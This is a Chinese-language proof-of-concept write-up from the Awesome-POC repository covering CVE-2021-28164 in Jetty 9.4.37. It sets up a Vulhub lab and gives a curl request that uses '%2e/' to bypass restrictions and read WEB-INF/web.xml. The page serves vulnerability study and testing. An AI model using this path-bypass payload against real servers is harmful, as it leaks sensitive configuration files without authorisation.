admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-28164.md

40 lines
1.1 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-28164
## 漏洞描述
Eclipse Jetty是一个开源的servlet容器它为基于Java的Web容器提供运行环境。
Jetty 9.4.37引入对RFC3986的新实现而URL编码的`.`字符被排除在URI规范之外这个行为在RFC中是正确的但在servlet的实现中导致攻击者可以通过`%2e`来绕过限制下载WEB-INF目录下的任意文件导致敏感信息泄露。该漏洞在9.4.39中修复。
参考链接:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
- https://xz.aliyun.com/t/10039
## 环境搭建
Vulhub执行如下命令启动一个Jetty 9.4.37
```
docker-compose up -d
```
服务启动后,访问`http://your-ip:8080`可以查看到一个example页面。
![image-20220224164457554](images/202202241644641.png)
## 漏洞复现
直接访问`/WEB-INF/web.xml`将会返回404页面
![image-20220224164854151](images/202202241648274.png)
使用`%2e/`来绕过限制下载web.xml
```
curl -v 'http://192.168.1.162:8080/%2e/WEB-INF/web.xml'
```
![image-20220224164909832](images/202202241649911.png)
Reference in New Issue Copy Permalink